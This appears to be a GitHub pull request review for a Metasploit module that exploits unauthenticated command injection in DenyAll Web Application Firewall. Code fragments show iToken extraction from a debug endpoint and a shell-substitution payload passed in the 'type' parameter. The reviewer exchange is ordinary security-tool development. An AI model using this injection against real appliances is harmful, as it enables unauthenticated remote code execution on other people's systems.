New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Adding DenyAll Web Application Firewall RCE module #8980
Conversation
| } | ||
| }) | ||
|
|
||
| if res && res.code == 200 && res.body.include?("iToken") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This iToken extraction code should be moved to a separate method since the exact same code is also required for exploiting. We can save on a few lines of code.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It's done and retested. Thank you very much for review.
|
if i get some time over the weekend (which is likely) I've got my eye on this. |
| @@ -0,0 +1,37 @@ | |||
| ## Vulnerable Application | |||
|
|
|||
| This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user. | |||
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Unauthenticated users
|
|
||
| This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user. | ||
|
|
||
| **Vulnerable Application Installation Steps** |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
For consistency I think you can remove this bold area and just let it all blend in to one.
|
|
||
| You just need to follow instruction above URL. | ||
|
|
||
| ## Verification Steps |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Verification steps should be like in your PR submission, https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/ms17_010_eternalblue.md#verification-steps for an example
|
|
||
| ## Verification Steps | ||
|
|
||
| A successful check of the exploit will look like this: |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Add the heading of ##Scenarios
| super(update_info(info, | ||
| 'Name' => "DenyAll Web Application Firewall Remote Code Execution", | ||
| 'Description' => %q{ | ||
| This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
users
|
|
||
| def exploit | ||
| # Get iToken from unauthenticated accessible endpoint | ||
| print_status("Extracting iToken value") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
change " to '
| 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'), | ||
| 'vars_get' => { | ||
| 'applianceUid' => "LOCALUID", | ||
| 'typeOf' => "debug" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
change " to '
| 'method' => 'GET', | ||
| 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'), | ||
| 'vars_get' => { | ||
| 'applianceUid' => "LOCALUID", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
change " to '
| 'iToken' => token, | ||
| 'tag' => "tunnel", | ||
| 'stime' => r, | ||
| 'type' => "#{r}$(python -c \"#{payload.encoded}\")" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
if the server is php based, was there a particular reason why the default payload is python? There is a php meterpreter, but didn't know if the php pushes to python or something like that where python would be the better option
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for all the review @h00die. Nodejs, python and different type of technologies also being used by this product. Also, as far as I know python meterpreter has much more capabilities than the php, such as stdapi.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
i'll give this a run over the weekend, i'll also try out the php payload, would be a good thing to note that it also works (for curious minds like myself who have encountered issues in the past)
| ``` | ||
| msf > use exploit/linux/http/denyall_exec | ||
| msf exploit(denyall_exec) > | ||
| msf exploit(denyall_exec) > set RHOST 35.176.123.128 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
These look to be public IPs (unverified), you may want to change them to something else like 1.1.1.1 and 2.2.2.2
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It was my AWS London instance IP that I've used for testing purpose. It's not alive anymore.
|
Worked fine for me! I actually deployed 6.2.0. Switched to a generic shell as well. |
|
A few minor edits on the docs still left to do and i'll get this landed! |
|
i take it back, landing now. |
Release NotesThe DenyAll Web Application Firewall Remote Code Execution module has been added to the framework. It targets versions 6.3.0 and 6.2.0. |
|
Thanks for the contribution, looked pretty good from the start, and thanks for being so responsive! |
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
Verification
List the steps needed to make sure this thing works
msfconsoleuse exploit/linux/http/denyall_waf_execRHOSTLHOSTcheckThe target appears to be vulnerable.exploitiTokenvalue extraction.meterpretersession.Here is the advisory and technical details about that vulnerability.
https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/